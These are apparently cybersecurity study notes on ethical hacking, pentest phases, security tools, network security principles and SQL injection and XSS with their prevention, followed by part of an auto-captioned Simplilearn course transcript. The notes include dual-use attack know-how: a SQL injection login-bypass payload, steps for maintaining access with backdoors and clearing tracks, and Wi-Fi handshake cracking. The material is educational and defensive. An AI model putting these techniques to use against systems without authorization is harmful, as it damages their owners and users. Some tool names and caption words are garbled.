What is cryptanalysis and what are some common techniques used in it? Cryptanalysis is the process of decrypting encrypted data (ciphertext) without knowing the secret key. It involves reversing the encryption algorithm to figure out the original message. Common cryptanalysis techniques include brute-force attacks (trying every possible key combination), dictionary attacks (using a list of potential passwords or keys), and rainbow table attacks (comparing ciphertext with pre-calculated hashes to find matches). The success and time required for these techniques vary depending on the strength of the encryption and the resources available to the attacker.
What are the differences between white hat, black hat, and gray hat hackers? Hackers are often categorized by their ethical intentions. White hat hackers (ethical hackers) use their skills to identify vulnerabilities in systems and networks with the permission of the owner, with the goal of improving security. They perform penetration testing and report findings to help organizations patch weaknesses. Black hat hackers, on the other hand, use their skills for malicious purposes, such as stealing data, disrupting services, or financial gain, without authorization. Gray hat hackers operate in a less defined area; they may sometimes act without permission but without malicious intent, often disclosing vulnerabilities they find publicly or to the affected organization.

Ethical Hacking and Penetration Testing

What is penetration testing and what are the typical phases involved? Penetration testing is a specific type of ethical hacking that focuses on actively attempting to penetrate information systems using various attack methods. The goal is to identify and exploit vulnerabilities to assess the security posture of a system or network. The typical phases of penetration testing include:

Reconnaissance (Information Gathering): Collecting as much information as possible about the target, including IP addresses, domains, network architecture, and operating systems.
Scanning: Using tools to identify open ports, services running, and potential vulnerabilities based on the information gathered.
Exploitation: Attempting to exploit the identified vulnerabilities to gain unauthorized access to the system or data.
Post-Exploitation: Once access is gained, exploring the compromised system to understand the extent of the breach and potential impact.
Reporting: Documenting the findings, including the vulnerabilities identified, the methods used to exploit them, and recommendations for remediation.

What is SQL injection and how can it be exploited? SQL injection is a web application vulnerability that allows an attacker to inject malicious SQL code into an application’s database queries. This can happen when user input is not properly sanitized before being used in a SQL query. By crafting malformed queries, attackers can bypass authentication, extract sensitive data, modify database content, or even execute arbitrary commands on the database server. Exploitation often involves using special SQL characters and operators (like single quotes, OR, 1=1) in input fields to manipulate the logic of the queries sent to the database. Different types of SQL injection attacks exist, including in-band (error-based and union-based), blind (boolean-based and time-based), and out-of-band.
What is a Denial of Service (DoS) attack and how can it impact a system or network? A Denial of Service (DoS) attack is an attempt to make a machine or network resource unavailable to its intended users by disrupting the service of a host connected to the internet. This is typically achieved by flooding the target with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled. A Distributed Denial of Service (DDoS) attack uses multiple compromised computer systems to attack a single target, amplifying the impact. DoS/DDoS attacks can lead to service outages, financial losses, and reputational damage. Mitigation strategies include over-provisioning bandwidth, using Content Delivery Networks (CDNs), and implementing traffic filtering and rate limiting.
What is Wi-Fi hacking and what tools are commonly used for it? Wi-Fi hacking refers to the process of attempting to gain unauthorized access to a wireless network. Common tools used for this purpose include Aircrack-ng (a suite of tools for packet sniffing, password cracking, and more), and tools within Kali Linux. Techniques often involve capturing the WPA/WPA2 handshake (a four-way exchange that occurs when a device connects to a Wi-Fi network) and then attempting to crack the password offline using brute-force or dictionary attacks. These tools can also be used for legitimate security auditing of wireless networks to identify vulnerabilities. It’s crucial to have permission before attempting to audit or penetrate any wireless network.

Cyber Security Fundamentals: A Comprehensive Overview

Cyber security fundamentals revolve around the essential principles and practices designed to protect computer systems, networks, and digital information from unauthorized access, use, disclosure, disruption, modification, or destruction. In today’s digital world, where cyber threats are pervasive, cyber security has become more critical than ever.

Here are some fundamental aspects of cyber security discussed in the sources:

The Importance of Cyber Security: With the increasing number of cyber threats, safeguarding networks, applications, and data is a top priority. The demand for skilled cyber security professionals, particularly ethical hackers, is expected to grow significantly. Companies across various industries need these professionals to secure their systems. The potential financial impact of cyber attacks, such as ransomware attacks, which cost institutions billions of dollars, underscores the necessity of robust cyber security measures.
Ethical Hacking as a Core Component: Ethical hacking involves using the same tools and techniques as malicious hackers to identify and fix security vulnerabilities before they can be exploited. Ethical hackers, also known as white hat hackers, work with the permission of the system owner to stress-test their platforms and strengthen security. This proactive approach helps organizations prevent data breaches and save billions of dollars.
Understanding Threat Actors: It’s crucial to understand the different types of hackers.
Black hat hackers exploit security vulnerabilities for monetary gain, often stealing or destroying data. They operate with malicious intent and try to remain anonymous.
White hat hackers (ethical hackers) use their skills to identify and remedy security flaws to help organizations improve their security posture. They are authorized to act on the company’s behalf.
Grey hat hackers are a blend of both, who may snoop on systems without consent but inform the owner of vulnerabilities, sometimes for a fee.
Script kiddies rely on existing hacking tools without much technical understanding.
Nation-sponsored hackers are employed by governments for espionage and other purposes.
Core Concepts: A thorough introduction to cyber security involves learning the basic terminology, different types of threats, how these threats work, and the fundamental working principles.
Networking Fundamentals: A strong grasp of how the internet works, including operating systems, TCP/IP, OSI model, routing, and switching, is absolutely essential for entering the field of cyber security. Understanding network protocols (e.g., TCP/IP), network security principles, and firewall configurations is fundamental for identifying vulnerabilities.
Operating Systems Proficiency: Proficiency in various operating systems like Windows, Linux, and macOS is crucial. It allows cyber security professionals to safeguard the fault lines across different platforms as they directly interact with these systems daily.
Cryptography: Knowledge of cryptography, including encryption, decryption, cryptographic algorithms, and protocols, is very important in cyber security. Cryptography is the science of securing data through encryption to prevent unauthorized access. Techniques like AES encryption are used to scramble data, making it difficult for attackers to crack.
Risk Management: Understanding risk assessment, mitigation strategies, and compliance frameworks like GDPR and HIPAA is a key aspect of cyber security.
Cyber Security Laws and Ethics: Awareness of legal and ethical considerations in cyber security is also fundamental.
Essential Security Technologies: Familiarity with security technologies such as firewalls, intrusion detection and prevention systems (IDPS), antivirus software, and endpoint security is necessary. Firewalls monitor network traffic and block unauthorized access based on security rules.
Vulnerability Assessment and Penetration Testing: Hands-on experience with tools like Nessus, Metasploit, NMAP, and Burp Suite is crucial for identifying and exploiting vulnerabilities to improve security. Penetration testing simulates real-world attacks to uncover weaknesses in systems and networks.
Incident Response: Understanding security operations, incident response, threat hunting, log analysis, and Security Information and Event Management (SIEM) is vital for handling security breaches. Collecting system logs is a critical part of incident response and forensic analysis.
Secure Coding Practices: Knowledge of secure software development practices and common vulnerabilities like OWASP Top 10 is important for preventing security flaws in applications.
Staying Updated: The field of cyber security is constantly evolving, so staying updated with the latest threats and attack methodologies is crucial for effective defense.

In summary, cyber security fundamentals encompass a broad range of technical knowledge, ethical considerations, and practical skills aimed at protecting digital assets from a growing landscape of cyber threats. A strong foundation in networking, operating systems, cryptography, and ethical hacking principles forms the bedrock of a successful career in this critical field.

Understanding Ethical Hacking Principles and Practices

Ethical hacking encompasses a range of concepts centered around proactively identifying and mitigating security vulnerabilities in computer systems, networks, and applications with the permission of the owner. It involves using the same tools and techniques as malicious hackers, but with the intent to improve security rather than to cause harm or personal gain.

Here are some key ethical hacking concepts discussed in the sources:

Definition and Purpose: Ethical hacking is the process of taking security measures to safeguard data and networks from malicious cyber attacks. Ethical hackers use every tool at their disposal to try and breach security barriers and find potential vulnerabilities. The core purpose is to discover weaknesses or vulnerabilities in information systems in a legal and ethical manner. By identifying these flaws, ethical hackers help organizations to strengthen their defenses and protect against real cyber threats.
Ethical vs. Malicious Hacking: The key differentiator between ethical (white hat) and malicious (black hat) hacking lies in intent and authorization.
Black hat hackers exploit security vulnerabilities for monetary gain, aiming to steal or destroy private data, alter websites, or disrupt networks. They have malicious intent and try to hide their identities.
White hat hackers (ethical hackers) perform the same activities but with the consent of the system owner and with the goal of identifying and remedying security flaws. Their intent is to help the organization and improve its security posture.
Types of Hackers: Beyond black and white hats, there are also grey hat hackers who operate in a more ambiguous space, potentially snooping without consent but informing owners of vulnerabilities. Script kiddies use existing tools without deep technical understanding. Nation-sponsored hackers conduct cyber activities on behalf of governments, and hacktivists use hacking to promote political agendas. Ethical hacking primarily falls under the domain of white hat activities.
Roles and Responsibilities of an Ethical Hacker: Ethical hackers have several responsibilities, including:
Conducting security assessments to identify an organization’s security posture by evaluating existing security controls.
Identifying and testing vulnerabilities in systems, networks, and applications.
Developing tools and scripts to enhance security or to test for vulnerabilities.
Performing risk assessments to determine the potential impact of identified vulnerabilities.
Developing and recommending security policies.
Providing guidance on mitigating or resolving identified weaknesses.
Potentially training staff on network security best practices.
Documenting findings and compiling detailed reports on vulnerabilities and recommendations.
The Ethical Hacking Process: The typical ethical hacking process involves several phases:
Reconnaissance (Information Gathering): Collecting as much information as possible about the target system or organization, including network infrastructure, operating systems, and potential weak points. Tools like Nmap and Netdiscover can be used in this phase.
Scanning: Identifying open ports, services, and potential vulnerabilities using tools like Nmap and vulnerability scanners like Nessus.
Gaining Access (Exploitation): Attempting to exploit identified vulnerabilities to gain unauthorized access to the system or network, often using tools like Metasploit.
Maintaining Access: Establishing mechanisms to retain access to the compromised system for further analysis, which might involve installing backdoors or Trojans.
Clearing Tracks: Removing any evidence of the hacking activity to avoid detection.
Reporting: Documenting all findings, the vulnerabilities discovered, the exploitation process, and providing recommendations for remediation.
Essential Skills and Knowledge: A successful ethical hacker requires a diverse set of skills:
Strong knowledge of computer networks and protocols (TCP/IP, HTTP, etc.).
Proficiency in operating systems such as Windows, Linux, and macOS, including their server versions.
Understanding of programming and scripting languages like Python, Java, C++, PHP, Ruby, HTML, and JavaScript for developing scripts, automating tasks, and understanding web applications.
Knowledge of web applications and databases, including common vulnerabilities like SQL injection and cross-site scripting (XSS).
Familiarity with security technologies like firewalls, intrusion detection/prevention systems (IDS/IPS), antivirus software, and endpoint security.
Understanding of cryptography, including encryption and decryption techniques.
Awareness of common attack vectors and techniques, including malware, social engineering, and network attacks.
Strong problem-solving and analytical thinking skills.
Awareness of cyber security laws and ethics.
Ethical Hacking Tools: Ethical hackers utilize a wide range of tools for various tasks:
Network Scanners: Nmap is a key tool for network discovery and port scanning.
Vulnerability Scanners: Nessus and Acunetix are used to identify potential vulnerabilities in systems and web applications.
Penetration Testing Frameworks: Metasploit is a powerful framework with a vast collection of exploits for testing vulnerabilities.
Packet Analyzers: Wireshark is used to capture and analyze network traffic.
Password Cracking Tools: John the Ripper is used for dictionary attacks and brute-force password cracking.
Web Application Testing Tools: Burp Suite is a popular tool for testing web application security.
SQL Injection Tools: SQLmap automates the process of detecting and exploiting SQL injection vulnerabilities.
Kali Linux is a popular Linux distribution specifically designed for penetration testing, containing hundreds of pre-installed ethical hacking tools.
Social Engineering: This is a non-technical hacking technique that involves manipulating humans into revealing confidential information or performing actions that compromise security. Common social engineering tactics include phishing, pretexting, and exploiting human curiosity or greed.
Importance and Benefits for Organizations: Ethical hacking is crucial for organizations to proactively identify and address security weaknesses before malicious actors can exploit them. This helps in preventing data breaches, minimizing financial losses, and protecting reputation. Regular security audits conducted by ethical hackers help organizations stay ahead of cyber threats and ensure the integrity of their digital infrastructure.
Certifications: Obtaining certifications like Certified Ethical Hacker (CEH), Offensive Security Certified Professional (OSCP), and CompTIA Security+ can validate an ethical hacker’s skills and enhance their credibility.
Job Roles: The field of ethical hacking offers various job roles, including Ethical Hacker, Penetration Tester, Network Security Engineer, Cyber Security Analyst, Information Security Manager, Security Consultant, and Cyber Security Engineer.
Ethical Hacking and Penetration Testing: While often used interchangeably, penetration testing is a specific subset of ethical hacking that focuses on actively attempting to penetrate information systems using various attack methods. Ethical hacking is a broader field that encompasses not only penetration testing but also vulnerability assessments, policy development, and other proactive security measures.

By understanding these concepts, individuals and organizations can better appreciate the role and importance of ethical hacking in the ongoing battle against cyber threats.

Security Testing Tools for Ethical Hacking

Security testing tools are essential for ethical hackers and security professionals to identify, analyze, and exploit vulnerabilities in computer systems, networks, and applications. These tools enable a proactive approach to security, allowing organizations to strengthen their defenses before malicious actors can cause harm.

Here is a discussion of various security testing tools mentioned in the sources:

1. Vulnerability Scanners:

Nessus: This is an automated vulnerability scanner designed to identify security weaknesses within hosts, operating systems, and networks. It uses a built-in database of known vulnerabilities and scans the target environment to find potential flaws. Ethical hackers use Nessus to discover a list of potential vulnerabilities that can then be further investigated.
Acunetix and Arachnne: These are examples of application scanners that focus on identifying flaws specifically within web applications. They help security testers understand potential weaknesses like SQL injection or cross-site scripting.
OpenVAS (Greenbone Vulnerability Manager): This tool provides a comprehensive vulnerability management system, performing scans to detect vulnerabilities across the target.
Netsparker: This is another automated web application security scanner that is configurable and helps secure web applications by identifying reported vulnerabilities.

2. Penetration Testing Frameworks and Tools:

Metasploit: This is a powerful penetration testing framework widely used by both ethical hackers and malicious actors. It contains a vast collection of readymade and custom exploits that can be used to probe for and exploit systemic vulnerabilities in networks and servers. Ethical hackers use Metasploit to validate vulnerabilities identified by scanners and to simulate real-world attacks by crafting or choosing appropriate exploits. It can be used to gain access, and depending on the vulnerability, even run root commands.
Burp Suite Professional: This is a popular proxy-based tool used for penetration testing and finding vulnerabilities in web applications. It allows for the evaluation of web application security through hands-on testing.

3. Network Analysis Tools:

Nmap (Network Mapper): This is a free and open-source utility for network discovery and security auditing. It can identify live hosts on a network, the services they are running, their operating systems, and the types of packet filters and firewalls in use. Ethical hackers use Nmap in the early reconnaissance phase to understand the target’s network infrastructure and identify potential entry points through open ports and services.
Wireshark: This is a free and open-source packet analyzer used for network troubleshooting, analysis, and security auditing. It captures network traffic at a microscopic level, allowing for detailed analysis of data packets. Ethical hackers use Wireshark to monitor network traffic during vulnerability scans and exploitation attempts, helping them understand the communication flow and analyze the success of their attacks.

4. Specific Attack Tools:

SQLmap (SQL map): This is an automated tool specifically designed for detecting and exploiting SQL injection vulnerabilities in web applications. It can automatically craft and execute SQL injection queries to test for flaws and potentially retrieve data from databases.
John the Ripper: This is an open-source password security auditing and password recovery tool. It supports various password cracking techniques, including dictionary attacks and brute-force attacks, to test the strength of passwords.
Air Garden: This is a multi-use bash script for Linux systems used for hacking and auditing wireless networks. It can be used to launch denial-of-service attacks on Wi-Fi networks and supports various Wi-Fi hacking methods like WPS hacking and handshake captures.

5. Operating Systems for Security Testing:

Kali Linux: This is a Debian-based Linux distribution specifically designed for penetration testing and security auditing. It comes with hundreds of pre-installed tools targeted towards various information security tasks, including vulnerability assessment, penetration testing, computer forensics, and reverse engineering. Its features, pre-installed tools, and customizability make it a popular choice for ethical hackers.

The Role of Security Testing Tools in Ethical Hacking:

Ethical hackers utilize these tools throughout the different phases of penetration testing:

Reconnaissance: Tools like Nmap are used to gather information about the target network and systems.
Scanning: Nmap is further used for port scanning, and vulnerability scanners like Nessus and Acunetix are employed to identify potential weaknesses.
Gaining Access: Metasploit is a key tool in this phase, used to exploit identified vulnerabilities. Tools like SQLmap and password cracking tools like John the Ripper might also be used depending on the identified flaws.
Maintaining Access: While not explicitly a “tool,” understanding operating system functionalities for installing backdoors (as mentioned in the context of malicious hackers) is relevant, although ethical hackers focus on reporting such potential avenues rather than maintaining unauthorized access long-term in a real audit.
Reporting: While there isn’t a specific tool listed for reporting, the output and findings from all the above tools are crucial for generating a comprehensive security assessment report.

It’s important to note that the essence of ethical hacking goes beyond simply running automated tools. Ethical hackers need to understand the reports generated by these tools, analyze the findings, and potentially craft their own exploits or use existing ones in a specific manner to bypass security controls. They also need to be aware of security laws and standards to ensure their testing activities are legal and ethical.

Network Security Core Principles and Key Tools

Based on the sources, several key principles underpin network security. Network security is a set of technologies and processes aimed at protecting the usability, integrity, and confidentiality of a company’s network infrastructure and the data transmitted and stored within it. It involves preventing unauthorized access, misuse, modification, or destruction of the network and its resources.

Here are some core network security principles derived from the sources:

Confidentiality: Ensuring that sensitive information is protected from unauthorized disclosure. Cryptography, such as encryption of data in transit (mentioned with HTTPS in and the use of VPNs with IPSec in), plays a vital role in maintaining confidentiality.
Integrity: Maintaining the accuracy and completeness of data, preventing unauthorized modification. Authentication Header (AH) within IPSec is responsible for data integrity.
Availability: Ensuring that authorized users have reliable access to network resources and data when needed. Protecting against denial-of-service (DoS) attacks (mentioned in the context of botnets in and cyber warfare in) is crucial for maintaining availability.
Authentication: Verifying the identity of users, devices, or applications trying to access the network. This ensures that only legitimate entities are granted entry.
Authorization: Defining and enforcing the level of access granted to authenticated users. This principle ensures that users only have access to the resources necessary for their roles.
Layering of Security (Defense in Depth): Implementing multiple security controls at different levels of the network to provide comprehensive protection. If one layer fails, others are in place to offer continued security. The sources discuss physical, technical, and administrative security layers.
Physical Security: Protecting physical access to network components like servers and routers.
Technical Security: Utilizing hardware and software-based controls such as firewalls, intrusion prevention systems (IPS), and encryption.
Administrative Security: Implementing policies, procedures, and user training to govern security-related behavior. Password policies and training staff for network security are examples of administrative controls.
Proactive Security: Identifying and mitigating vulnerabilities before they can be exploited by malicious actors. Ethical hacking and penetration testing are proactive approaches to security, where vulnerabilities are intentionally sought out and addressed.
Continuous Monitoring and Analysis: Regularly monitoring network traffic and security events to detect and respond to threats. Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) are tools used for this purpose. Wireshark is a tool that allows for real-time and offline network traffic analysis. Behavioral analytics can also help detect anomalies in network traffic that might indicate an attack.
Policy Enforcement: Establishing and consistently enforcing security policies to guide user behavior and system configurations. Ethical hackers may analyze and enhance an organization’s security policies.
Risk Assessment: Identifying potential threats and vulnerabilities and evaluating the potential impact they could have on the organization. Ethical hackers often perform risk assessments to prioritize vulnerabilities based on their criticality.
Security Awareness and Training: Educating users about security threats and best practices to minimize the risk of human error being exploited. Training staff on what is allowed and not allowed helps secure the organization.

Key tools that support these principles include:

Firewalls: Act as a barrier between trusted and untrusted networks, controlling incoming and outgoing traffic based on defined rules. They can be hardware or software-based.
Intrusion Prevention Systems (IPS): Continuously scan networks for malicious activity and take action to block or prevent it.
Virtual Private Networks (VPNs): Create encrypted connections over public networks, ensuring secure transmission of sensitive data. VPNs often utilize IPSec protocols.
Network Scanners (e.g., Nmap): Used for network discovery, identifying open ports and services, and potential vulnerabilities.
Vulnerability Scanners (e.g., Nessus, Acunetix): Automatically identify known security weaknesses in systems and applications.
Packet Analyzers (e.g., Wireshark): Capture and analyze network traffic for troubleshooting, security analysis, and understanding communication protocols.

By adhering to these network security principles and utilizing appropriate tools, organizations can significantly reduce their risk of falling victim to cyber threats and maintain a secure network environment.

Web Application Vulnerabilities: SQL Injection and XSS

Based on the sources, web applications are a significant target for security vulnerabilities because they are often accessible over the internet or internal networks and handle sensitive data. The sources highlight several key web application vulnerabilities, their exploitation, and preventative measures.

1. SQL Injection:

Definition: SQL injection is a code injection technique that might exploit security vulnerabilities occurring in the database layer of an application. These vulnerabilities are present when user input is improperly filtered and is inserted into SQL statements. This allows attackers to send malicious SQL code that can be executed by the backend database.
Exploitation: Attackers can craft malformed SQL queries by injecting special characters (like single quotes) and SQL operators into input fields such as login forms or URL parameters. By doing so, they can bypass authentication mechanisms, retrieve sensitive data, modify database content, or even execute arbitrary commands on the database server. The demo in the source shows how injecting ‘ or 1=1 — – into a username field can bypass authentication. Attackers may also try to induce errors to understand the database structure and version, which helps in crafting more effective attacks. Tools like SQLmap are designed to automate the process of detecting and exploiting SQL injection vulnerabilities.
Types of SQL Injection: The source mentions different types of SQL injection:
In-band SQL Injection: The attacker can receive the results of their attack directly through the same communication channel used to inject the code. This includes:
Error-based Injection: Exploiting database error messages to gain information about the database structure.
Union-based Injection: Using the UNION SQL keyword to combine the results of multiple queries into a single response.
Blind SQL Injection: The attacker cannot see the results of their injected queries directly but can infer information based on the application’s response (e.g., different responses for true or false conditions, or time delays). This includes:
Boolean-based: Observing different application responses based on true or false conditions in the injected query.
Time-based: Injecting queries that cause a time delay in the database response to confirm successful execution.
Out-of-band SQL Injection: Less common, this involves the attacker relying on different channels (e.g., email, DNS requests) to receive data from the database server.
Prevention: The source outlines several best practices to prevent SQL injection attacks:
Use Prepared Statements and Parameterized Queries: These ensure that user-supplied data is treated as data and not as executable code.
Object Relational Mapping (ORM): ORM frameworks can help abstract database interactions and reduce the risk of direct SQL injection.
Escaping Inputs: Properly sanitizing user input by escaping special characters that have meaning in SQL can prevent them from being interpreted as code. However, the source cautions that not all injection attacks rely on specific characters, and not all languages have equally effective escaping functions.
Password Hashing: While not directly preventing SQL injection, properly hashing passwords prevents attackers from easily obtaining plaintext credentials if a database breach occurs.
Third-Party Authentication: Utilizing secure third-party authentication mechanisms can reduce the application’s responsibility for handling sensitive credentials.
Web Application Firewalls (WAFs): WAFs can be configured to identify and block malicious SQL queries before they reach the application.
Secure Coding Practices and Software Updates: Using secure coding practices and keeping software and libraries up to date helps patch known vulnerabilities.
Principle of Least Privilege: Database user accounts used by the application should have the minimum necessary privileges.

2. Cross-Site Scripting (XSS):

Definition: Cross-Site Scripting (XSS) attacks involve injecting malicious scripts (most commonly JavaScript) into websites viewed by other users. This happens when a web application does not properly sanitize user input before displaying it to other users.
Exploitation: Attackers can inject malicious scripts through various entry points, including:
Input fields (e.g., search bars, comment sections, forms)
URL parameters
Even malicious advertisements
Fake emails containing malicious links The injected script then executes in the victim’s browser when they view the compromised page. This can allow the attacker to:
Steal session cookies, allowing them to impersonate the victim and gain unauthorized access to their accounts.
Capture keystrokes and other sensitive information.
Redirect the user to malicious websites.
Run other web browser-based exploits.
Display fake login forms to steal credentials. The demos in the source illustrate different types of XSS attacks and how they can be executed by injecting JavaScript code into vulnerable web application components.
Types of XSS Attacks: The source describes three main types of XSS attacks:
Reflected XSS: The malicious script is not permanently stored on the web server. Instead, it is reflected back to the user’s browser as part of the server’s response, often through malicious links or submitted forms. The attack is only effective if the user clicks the malicious link or submits the crafted form.
Stored XSS: The malicious script is permanently stored on the target server (e.g., in a database, message board, or comment section). The script is then executed every time a user views the page containing the malicious content, potentially affecting many users. This type is considered riskier due to its persistent nature.
DOM-based XSS: The vulnerability exists in the client-side JavaScript code rather than in the server-side code. The attack manipulates the Document Object Model (DOM) in the victim’s browser, causing the client-side script to execute unexpectedly. The malicious payload might be in the URL fragment (after the #) or other client-side data sources.
Prevention: The source provides several methods to prevent XSS attacks:
Input Validation and Sanitization: Always screen and validate any user input before including it in HTML output or using it in client-side scripts. Sanitize user input by removing or encoding potentially harmful characters. Validation should occur on both the client-side and server-side.
Avoid Displaying Untrusted User Input: If possible, avoid displaying any untrusted user input directly on web pages.
Proper Output Encoding/Escaping: When user input must be displayed, properly encode or escape the data based on the context in which it will be rendered (e.g., HTML encoding, JavaScript encoding, URL encoding). Different contexts require different encoding rules, and sometimes multiple layers of encoding are necessary.
Content Security Policy (CSP): CSP is an HTTP header that allows website owners to control the sources of content (e.g., scripts, styles, images) that the browser is allowed to load for their website. This can significantly reduce the risk of XSS attacks by preventing the browser from executing malicious scripts from untrusted sources.
HTTPOnly Cookie Flag: Setting the HTTPOnly flag on cookies prevents client-side scripts (like JavaScript) from accessing them. This can mitigate the impact of XSS attacks that aim to steal session cookies. However, the source notes that this relies on browser support.
Automated Security Testing: Use automated testing tools to scan web applications for XSS vulnerabilities before release.
Regular Security Audits and Updates: Regularly audit code for vulnerabilities and keep all software and libraries updated to patch known security flaws.

Relationship to Security Testing Tools and Principles:

Security testing tools like Burp Suite Professional and automated vulnerability scanners like Netsparker and Acunetix (mentioned in our previous conversation) are specifically designed to help identify web application vulnerabilities like SQL injection and XSS. Ethical hackers use these tools to probe web applications, identify potential weaknesses in input handling and output rendering, and verify the effectiveness of security controls.
The principle of proactive security is directly addressed by identifying and mitigating web application vulnerabilities through testing and secure coding practices.
Input validation and sanitization and proper output encoding are crucial aspects of secure coding, aligning with the network security principle of defense in depth by implementing security at the application level.
Continuous monitoring can also involve analyzing web application logs for suspicious activity that might indicate an attempted or successful exploitation of a vulnerability.

Understanding and addressing web application vulnerabilities like SQL injection and XSS is crucial for maintaining the confidentiality, integrity, and availability of web-based services and the data they handle, which are core principles of network security. The OWASP Broken Web Applications project, as mentioned in the source, provides a legal and safe environment to practice identifying and exploiting these vulnerabilities to enhance security skills.

Ethical Hacking Full Course 2025 | Ethical Hacking Course for Beginners | Simplilearn

hello everyone and welcome to ethical hacking full course by simply learn in today’s digital world cyber threats are everywhere making cyber security more important than ever this course will teach you the same tools and techniques ethical hackers use to protect networks application and data from cyber attacks with cyber threats increasing the demand for ethical hackers is expected to grow even more by 2025 companies across industries need skilled professionals to secure their systems offering starting salaries around $70,000 in the US and around 6 to 10 LPA in India while experienced hackers can earn over $120,000 plus or 25 lakhs perom in India so in this course you’ll get hands-on experience with ethical hacking learn how to spot vulnerabilities and strengthen security systems so whether you’re new to cyber security or looking to sharpen your skills this course is your pathway to a high demand and well-paying career in ethical hacking but before we commence if you’re interested in stepping one of the most in demand fields in 2025 the advanced executive program in cyber security by simply learn is your perfect opportunity in just 6 months you’ll gain expertise in ethical hacking penetration testing ransomware analysis and advanced defense strategies through a hands-on industry relevant approach this program is offered in collaboration with Triple IT Bangalore and IBM features live interactive classes real world projects and industry recognized certifications so hurry up and enroll now find the course link description box below and in the pin comments data is the new gold imagine how much data is generated by just your smartphone every single day be it the pictures you click or the messages you send nearly 41 million messages are sent worldwide via WhatsApp every single minute so safeguarding your personal data against hackers has now become a top priority did you know that India leads the world when it comes to ethical hackers with 23% of the worldwide hacking population from India the top ethical hackers earn more than twice of what software engineers in India do but what makes ethical hacking such a demanding industry ethical hacking is the process of taking security measures to safeguard data and networks from malicious cyber attacks the hackers use every tool at their disposal to try and breach the security barrier and find any potential vulnerabilities the ethical ineth ethical hacking denotes the lack of malicious intent since these sessions are often permitted by the system owner or the network that is being hacked into to fix any compromised entry points before blackhead hackers discover and exploit them so what is a blackhead hacker you may ask a hacker who exploits security vulnerabilities for monetary gains like stealing or destroying private data altering disrupting or shutting down websites and networks is known as a blackhead hacker on the other end of the spectrum we have whitehead hackers who help people secure the networks by stress testing their platform against the most dangerous of cyber attacks that is with their consent of course but the most neutral of the bunch are greyhead hackers who may not ask for consent before snooping on a foreign system but they do inform the owner if they find any vulnerabilities sometimes in exchange for a small fee the security breaches have become less and less prevalent thanks to rigorous ethical hacking campaigns and corporate awareness programs the ability to fix critical security issues before black hat hackers leverage them has saved organizations billions of dollars google IBM Microsoft and virtually every major corporation are looking to protect the data so it shouldn’t come as a surprise that the ethical hacking and information security job market is set to rise by nearly 28% by 2026 with salaries going as high as $225,000 perom so that’s ethical hacking wrapped up in 2 minutes to catch more byite-size and detailed videos on different technologies subscribe to Simple Learn and stay updated scammers targeting institutions such as hospitals schools and government offices for ransom pocketed $1.1 billion last year compared with 567 million in 2022 cyber security experts act as a multi-level line of defense against cyber attacks through all internet activity securing individuals corporate giants tech multinational companies international agencies and even governments hence this extremely critical role demands a great pay and the demand for it continues to grow year after year with beginner level salaries averaging around $75,000 with years of experience it can go to above $200,000 for chief information officer level roles due to the extremely critical nature of this job role there is a demand across all verticals including defense healthcare banking tech and even education sector if you want to become a cyber security engineer in 2024 here is how you can jumpstart your career in this field we will split the entire learning path in three major sections beginning with core concepts level topics then we will move on to intermediate skill-based topics and eventually we will discuss what topics to learn in niche cyber security skills let us start with core concept level topics start with getting a thorough introduction to cyber security make sure to learn the basics of cyber security including all the important terminology types of threats how these threats work and what are the working principles in cyber security from there you can move on to mastering networking fundamentals this is an absolute must know to enter the field of cyber security you need to be thorough with how the internet works how the data highway functions right from the function of operating systems to understanding of TCPIP OC model routing and switching every single one of these concepts are critically important make sure to keep these skills handy at all times since they help in understanding the overarching concepts easily but it’s not just the networking part of operating systems that you need to know this is where the next important part comes into the picture operating systems proficiency in Windows Linux and possibly Macos operating systems allows you to work across all domains being adept in each of these helps you become better at safeguarding the fault lines across them this is critical for your day-to-day working since you will be directly iterating with these to perform your daily tasks it is not unknown that mathematics and computer science go hand in hand this extends to the field of cyber security too you need to learn cryptography where the knowledge of encryption decryption cryptographic algorithms and protocols is very important next up is risk management understanding risk assessment mitigation strategies and compliance frameworks like GDPR and HIPPA finally you should also understand cyber security laws and ethics awareness of legal and ethical considerations in cyber security let us now move on to two intermediate level skill and toolsbased topics security technologies familiarity with firewalls intrusion detection prevention systems antivirus software and endpoint security vulnerability assessment and penetration testing hands-on experience with tools like Nessus Metas-ploit NMAP and Burp Suite security operations incident response threat hunting log analysis and security information and event management secure coding practices knowledge of secure software development practices and common vulnerabilities like OASP top 10 cloud security understanding of cloud computing security principles and best practices including Oz Azure and Google Cloud Platform mobile security knowledge of mobile application security testing and best practices for securing mobile devices now that you have mastered core concepts and intermediate skills and tools based on your interest you can move on and choose one of the niche fields for learning niche cyber security skills industrial control systems security understanding of Scottis systems PLCS and protocols like Modbus and DNP3 app security knowledge of securing internet of things devices and protocols blockchain security understanding of blockchain technology and its security implications thread intelligence gathering analyzing and leveraging threat intelligence to enhance cyber security posture reverse engineering skill in analyzing malware and understanding its behavior red team blue team exercises participating in simulated attacks red team and defending against them blue team with that said we have reached towards the end of our video this learning path covers a broad range of topics and skills necessary for a cyber security engineer in 2024 starting from foundational concepts to specialized areas within the field you must make sure to stay updated and keep on aligning this learning path based on your requirements if you have any questions about this learning path or cyber security in general that needs to be answered make sure to let us know in the comment section below and we would be happy to help let’s understand what are the types of hackers so what are the types of hackers hacker is a technically skilled person uh who is very adept with computers they have good programming skills they understand how operating system works they understand how networks work they understand how to identify flaws and vulnerabilities within all of these aspects and then they understand and know how to misuse these flaws to get a outcome which would be detrimental to the health of the organization so there are six type of hackers that have been identified black hat hackers white hat hackers grey hat script kitties nation sponsored hackers and a hackists so blackey hackers are bas basically uh the malicious hackers who have malicious intent and have criminalistic tendencies they want to harm the organization by hacking into their infrastructure by destroying their infrastructure by destroying their data so that uh they can gain from it from a monetary perspective uh these guys are also known as crackers the main aspect of these uh people are that they have malicious intent they try to do unauthorized activities and they try it for personal gain another important aspect to remember is that a blackhat hacker will always try to hide their identity uh they will spoof their online digital identity by masking it by spoofing their IP addresses MAC addresses and try to remain anonymous on the network a white hat hacker on the other hand is also an ethical hacker or a security analyst who’s an individual who will do exactly the same thing that a black hat hacker would do minus the malicious intent plus the intent of helping the organization identifying the flaws and remedying them so that nobody else can misuse those vulnerabilities so they are authorized to act on the company’s behalf they are authorized to do that activity which would help the company identify those flaws and thus help the company mitigate those flaws improving on their security posture so these uh these kind of security experts or ethical hackers would help organizations defend themselves against unauthorized attacks greyhead hackers is a blend of both white hat and black hat hackers so here they can work defensively and offensively both they can 